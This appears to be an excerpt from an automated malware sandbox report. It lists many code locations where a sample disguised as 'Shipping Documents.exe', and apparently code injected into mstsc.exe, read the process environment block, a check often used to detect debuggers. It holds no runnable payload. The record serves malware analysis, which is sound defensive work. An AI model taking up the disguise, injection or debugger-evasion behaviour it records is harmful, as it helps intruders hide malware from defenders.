          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00B7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04863884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04863884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04800050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04800050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04811DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04811DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04811DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04898DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0486A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481513A mov eax, dword ptr fs:[00000030h]
